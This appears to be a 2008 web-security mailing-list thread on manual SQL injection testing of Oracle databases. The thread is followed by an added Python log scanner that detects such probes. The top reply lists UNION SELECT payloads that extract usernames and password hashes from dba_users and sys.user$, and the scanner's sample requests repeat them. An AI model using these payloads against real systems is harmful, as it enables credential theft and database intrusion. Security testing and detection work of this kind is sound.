
Re: [WEB SECURITY] Query: Manual sql injection testing in oracle database




union select username,password from dba_users
union select table_name from all_tables
union select username,password from sys.user$
union select column_name from ALL_TAB_COLUMNS  where table_name='tablename'

etc.....



On 1/16/08, Elad Shapira <eladexposed@gmail.com> wrote:
>
> Hello,
>
> Regarding Oracle and database security, you can use the following links:
>
> http://www.petefinnigan.com/
>
> http://www.red-database-security.com/
>
> http://ferruh.mavituna.com/makale/oracle-sql-injection-cheat-sheet/
>
> www.sqlsecurity.com
>
> http://www.imperva.com/application_defense_center/scuba/scubaugl.asp
>
> There are more... good luck!
>
> Kind Regards,
>
> Elad Shapira ("Zest")
>
> "Security, however, is an art, not a science." - RFC 3631
>
> On Jan 16, 2008 6:54 PM, surendra kumar <surendra_anil@yahoo.com> wrote:
>
> > Hi Guys,
> >
> > Can anybody guide me on how to do manual SQL injection testing in an Oracle database,
> > step by step, because I am a fresher in this database auditing?
> >
> > Regards
> > surendra
> >
>
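
Seen from the defending side, the probes listed in this reply stand out in request logs because they combine UNION SELECT with Oracle data-dictionary names. The following is an added example, not part of the original thread; the function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Oracle data-dictionary objects named in the reply above.
DICTIONARY_OBJECTS = ("dba_users", "all_tables", "sys.user$", "all_tab_columns")

# UNION [ALL] SELECT as whole keywords, with any whitespace between them.
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)

def normalize(value, max_rounds=3):
    """URL-decode until the value stops changing (bounded), then lowercase."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()

def classify(raw_value):
    """Return (severity, dictionary objects referenced) for one parameter value."""
    text = normalize(raw_value)
    if not UNION_SELECT.search(text):
        return ("none", [])
    hits = [obj for obj in DICTIONARY_OBJECTS if obj in text]
    # UNION SELECT alone is suspicious; naming a dictionary view is high severity.
    return ("high" if hits else "medium", hits)

def scan_request(path):
    """Classify every query parameter of a request path from an access log."""
    findings = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        severity, hits = classify(value)
        if severity != "none":
            findings.append((name, severity, hits))
    return findings

# Constructed sample request paths (not taken from any real log).
SAMPLE_REQUESTS = [
    "/item?id=42",
    "/search?q=credit+union+selection+committee",
    "/item?id=1+union+select+username,password+from+dba_users",
    "/item?id=1%2520UNION%2520SELECT%2520table_name%2520FROM%2520ALL_TABLES",
    "/report?name=x'+union+select+column_name+from+ALL_TAB_COLUMNS+where+table_name='tablename'",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request, "->", scan_request(request) or "clean")
```

A rule like this is a detection aid for log review or alerting, not a substitute for bind variables and a least-privilege application account that cannot read `dba_users` or `sys.user$`.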




Brought to you by http://www.webappsec.org